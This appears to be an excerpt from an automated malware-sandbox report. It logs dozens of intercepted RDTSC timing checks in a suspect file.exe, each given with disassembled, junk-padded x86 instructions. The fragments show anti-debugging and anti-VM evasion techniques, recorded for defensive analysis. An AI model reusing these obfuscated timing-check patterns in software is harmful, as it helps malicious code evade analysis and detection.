Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490E96 second address: 5490EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A00F5 second address: 54A00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C008C second address: 54C0092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0092 second address: 54C0096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0096 second address: 54C00A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00A5 second address: 54C00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00B4 second address: 54C00BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00BA second address: 54C00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00BE second address: 54C00C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00C2 second address: 54C00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00D5 second address: 54C0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dl 0x00000005 mov ch, A7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF0BCB462C0h 0x00000010 mov dword ptr [esp], ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF0BCB462BEh 0x0000001a add cl, FFFFFFB8h 0x0000001d jmp 00007FF0BCB462BBh 0x00000022 popfd 0x00000023 pushad 0x00000024 push eax 0x00000025 pop edx 0x00000026 mov dx, si 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [76FB65FCh] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0125 second address: 54C0129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0129 second address: 54C012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C012D second address: 54C0133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0133 second address: 54C0159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ecx, 1994C4A9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test eax, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FF0BCB462C1h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0159 second address: 54C015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C015E second address: 54C0202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF12E5B9AAEh 0x0000000f jmp 00007FF0BCB462C0h 0x00000014 mov ecx, eax 0x00000016 jmp 00007FF0BCB462C0h 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF0BCB462C7h 0x00000025 and ax, 824Eh 0x0000002a jmp 00007FF0BCB462C9h 0x0000002f popfd 0x00000030 push ecx 0x00000031 movsx edi, cx 0x00000034 pop eax 0x00000035 popad 0x00000036 and ecx, 1Fh 0x00000039 jmp 00007FF0BCB462BFh 0x0000003e ror eax, cl 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FF0BCB462C5h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0202 second address: 54C0227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BC8515DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0227 second address: 54C028A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00B52014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FF0C14F6505h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF0BCB462BEh 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FF0BCB462BDh 0x00000035 or eax, 2E9C3156h 0x0000003b jmp 00007FF0BCB462C1h 0x00000040 popfd 0x00000041 jmp 00007FF0BCB462C0h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C028A second address: 54C0290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0290 second address: 54C0294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0294 second address: 54C02C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FF0C120187Ch 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 movsx ebx, cx 0x00000016 mov cx, E0A7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF0BC8515E9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C02C4 second address: 54C0322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF0BCB462C2h 0x00000010 adc si, 2F68h 0x00000015 jmp 00007FF0BCB462BBh 0x0000001a popfd 0x0000001b call 00007FF0BCB462C8h 0x00000020 push eax 0x00000021 pop ebx 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF0BCB462BFh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0322 second address: 54C0326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0326 second address: 54C032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470010 second address: 547001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 454414A4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547001A second address: 54700A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462BBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007FF0BCB462C4h 0x00000016 mov ebx, eax 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007FF0BCB462C9h 0x00000021 and esp, FFFFFFF8h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FF0BCB462C3h 0x0000002d add eax, 6475542Eh 0x00000033 jmp 00007FF0BCB462C9h 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700A5 second address: 54700AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700AA second address: 54700B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700B2 second address: 54700FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 pushad 0x00000009 mov ax, 93A7h 0x0000000d jmp 00007FF0BC8515DCh 0x00000012 popad 0x00000013 mov dword ptr [esp], ecx 0x00000016 pushad 0x00000017 push esi 0x00000018 mov ebx, 7AA016F0h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FF0BC8515E4h 0x00000026 xor ah, 00000038h 0x00000029 jmp 00007FF0BC8515DBh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54700FD second address: 547015E instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 jmp 00007FF0BCB462C0h 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FF0BCB462C0h 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 jmp 00007FF0BCB462C0h 0x0000001e xchg eax, esi 0x0000001f jmp 00007FF0BCB462C0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF0BCB462BEh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547015E second address: 54701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515E1h 0x00000009 adc ax, 6346h 0x0000000e jmp 00007FF0BC8515E1h 0x00000013 popfd 0x00000014 mov dl, cl 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov di, ax 0x00000023 popad 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF0BC8515E8h 0x0000002e or ecx, 73D37D78h 0x00000034 jmp 00007FF0BC8515DBh 0x00000039 popfd 0x0000003a mov bl, al 0x0000003c popad 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 movsx edi, si 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54701EA second address: 5470262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BBh 0x00000009 sub al, FFFFFFEEh 0x0000000c jmp 00007FF0BCB462C9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF0BCB462C0h 0x00000018 adc cl, 00000068h 0x0000001b jmp 00007FF0BCB462BBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], edi 0x00000027 pushad 0x00000028 mov edi, ecx 0x0000002a mov esi, 47753F57h 0x0000002f popad 0x00000030 test esi, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF0BCB462C9h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470262 second address: 5470268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470268 second address: 54702D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF12E60464Ah 0x00000011 pushad 0x00000012 mov bx, cx 0x00000015 pushad 0x00000016 jmp 00007FF0BCB462BEh 0x0000001b jmp 00007FF0BCB462C2h 0x00000020 popad 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a jmp 00007FF0BCB462BEh 0x0000002f mov ch, 8Dh 0x00000031 popad 0x00000032 je 00007FF12E60461Ah 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702D5 second address: 54702DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702DA second address: 54702EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EA second address: 54702EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54702EE second address: 54703A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF0BCB462BDh 0x00000012 sub eax, 0E1A87B6h 0x00000018 jmp 00007FF0BCB462C1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF0BCB462C0h 0x00000024 jmp 00007FF0BCB462C5h 0x00000029 popfd 0x0000002a popad 0x0000002b or edx, dword ptr [ebp+0Ch] 0x0000002e jmp 00007FF0BCB462BEh 0x00000033 test edx, 61000000h 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FF0BCB462BEh 0x00000040 jmp 00007FF0BCB462C5h 0x00000045 popfd 0x00000046 mov bx, cx 0x00000049 popad 0x0000004a jne 00007FF12E6045B5h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov dl, E8h 0x00000055 call 00007FF0BCB462C0h 0x0000005a pop ecx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54703A6 second address: 54703AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546079D second address: 54607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607A3 second address: 54607A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54607A7 second address: 546085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FF0BCB462C6h 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007FF0BCB462BBh 0x00000017 xor ax, 7FCEh 0x0000001c jmp 00007FF0BCB462C9h 0x00000021 popfd 0x00000022 popad 0x00000023 mov di, si 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007FF0BCB462C3h 0x0000002e push esi 0x0000002f mov dl, 29h 0x00000031 pop ecx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FF0BCB462C7h 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007FF0BCB462C1h 0x00000046 sub ch, FFFFFFC6h 0x00000049 jmp 00007FF0BCB462C1h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546085A second address: 54608B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushfd 0x00000010 jmp 00007FF0BC8515E8h 0x00000015 sbb cl, FFFFFFC8h 0x00000018 jmp 00007FF0BC8515DBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF0BC8515E5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608B6 second address: 54608E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462C1h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608E4 second address: 54608EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608EA second address: 54608F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54608F0 second address: 5460945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF0BC8515E0h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FF0BC8515E1h 0x00000018 mov edx, esi 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007FF0BC8515DAh 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460945 second address: 546094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546094B second address: 5460951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460951 second address: 5460955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460955 second address: 5460988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515DEh 0x00000013 sbb cx, 8808h 0x00000018 jmp 00007FF0BC8515DBh 0x0000001d popfd 0x0000001e mov eax, 243C4E7Fh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460988 second address: 54609DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 18h 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FF0BCB462C6h 0x00000011 je 00007FF12E60BC9Ah 0x00000017 pushad 0x00000018 call 00007FF0BCB462BEh 0x0000001d pop edi 0x0000001e mov si, 929Dh 0x00000022 popad 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF0BCB462BFh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54609DD second address: 5460A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515DFh 0x00000009 sbb cx, B3BEh 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF0BC8515E0h 0x0000001a add ch, FFFFFFB8h 0x0000001d jmp 00007FF0BC8515DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov ecx, esi 0x00000028 jmp 00007FF0BC8515E6h 0x0000002d je 00007FF12E316F2Fh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cx, di 0x00000039 pushfd 0x0000003a jmp 00007FF0BC8515E9h 0x0000003f xor cx, 90B6h 0x00000044 jmp 00007FF0BC8515E1h 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A88 second address: 5460A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460A8E second address: 5460AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 jmp 00007FF0BC8515E6h 0x00000017 jne 00007FF12E316EC8h 0x0000001d jmp 00007FF0BC8515E0h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF0BC8515DAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460AEB second address: 5460AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460AFA second address: 5460B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF0BC8515DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 539175C3h 0x00000018 push esi 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B32 second address: 5460B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B38 second address: 5460B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460D46 second address: 5460D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C07 second address: 5470C88 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 51F4BB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, AEh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FF0BC8515DEh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 movzx esi, dx 0x00000017 mov ebx, 47801D5Eh 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov eax, edx 0x00000022 pushfd 0x00000023 jmp 00007FF0BC8515E7h 0x00000028 or ecx, 3EE9A2BEh 0x0000002e jmp 00007FF0BC8515E9h 0x00000033 popfd 0x00000034 popad 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF0BC8515E8h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C88 second address: 5470C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C97 second address: 5470C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470C9D second address: 5470CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F056C second address: 54F0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF0BC8515DBh 0x00000012 pop eax 0x00000013 mov bx, 5E1Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F0594 second address: 54F05B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF0BCB462C0h 0x00000008 pop eax 0x00000009 mov dh, 90h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
